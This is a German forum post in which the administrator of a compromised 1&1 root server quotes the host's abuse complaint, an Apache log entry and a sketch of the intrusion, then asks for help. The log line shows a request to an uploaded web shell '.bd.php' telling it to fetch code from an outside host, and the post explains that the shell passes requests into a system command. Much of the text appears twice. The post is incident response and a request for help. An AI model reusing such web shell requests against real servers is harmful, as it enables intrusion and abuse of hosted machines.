snake*sl
Registered User
Hi,
ich habe von 1und1 folgende Mail bekommen:
Ok, also hab ich sofort den Server in den Rescue-Modus geschaltet und die Platte gemountet um nach Ursachen zu suchen.
Im access_log vom Apache wurde ich dann fündig:
Den Ordner Uploads mit der Datei .bd.php habe ich dann in einer Demoinstallation von CMSmadesimple gefunden. Der Angreifer muss folgendermaßen vorgegangen sein:
Ich habe als erstes das komplette Web gelöscht und das vorsichtshalber Root-Passwort geändert.
Meine Fragen:
Was macht dieser Perl-Code genau?
Welche Maßnahmen würdet Ihr noch ergreifen?
Die Konfiguration meines Servers:
Suse 9.1, Confixx 3.2, Apache 2.2, PHP 4.4.4
ich habe von 1und1 folgende Mail bekommen:
wir haben mehrere Beschwerden über unerlaubte Zugriffsversuche (Portscans /
Hackversuche) seitens Ihres 1&1-RootServers (Vertragsnr.xxxxxxxx) erhalten.
Eine entsprechende Benachrichtigung finden Sie unten angehängt.
Wir möchten Sie deshalb darauf aufmerksam machen, dass dies strafbar ist und
rechtlich verfolgt werden kann.
Sollten uns diesbezüglich weiterhin Beschwerden erreichen, so sehen wir uns
leider gezwungen, den betreffenden Server vom Netz zu nehmen, um einen
weiteren Missbrauch unserer Infrastruktur zu unterbinden. Bitte überprüfen
Sie Ihren Server ggf. umgehend auf Viren / Würmer etc. Vielen Dank für Ihr
Verständnis.
Ok, also hab ich sofort den Server in den Rescue-Modus geschaltet und die Platte gemountet um nach Ursachen zu suchen.
Im access_log vom Apache wurde ich dann fündig:
Code:
66.0.156.250 - - [22/Jun/2007:05:17:11 +0200] "GET /uploads/.bd.php?in=http://tinfoilhat.net/%7Eebola/one.txt HTTP/1.0" 200 11 "-" "Wget/1.9"
- aktuelle Sicherheitslücke von CMSms ausgenutzt mit der er sich Admin-Zugang verschafft hat
- Die Datei .bd.php im Dateimanager von CMSms hochgeladen, der Dateimanager wird normalerweise für Bild- oder PDF-Uploads genutzt. Die Datei .bd.php emfängt $_REQUESTs und packt sie in einen system-Befehl
- Nun wurde dieser Code eingeschleußt
Ich habe als erstes das komplette Web gelöscht und das vorsichtshalber Root-Passwort geändert.
Meine Fragen:
Was macht dieser Perl-Code genau?
Welche Maßnahmen würdet Ihr noch ergreifen?
Die Konfiguration meines Servers:
Suse 9.1, Confixx 3.2, Apache 2.2, PHP 4.4.4
Last edited by a moderator: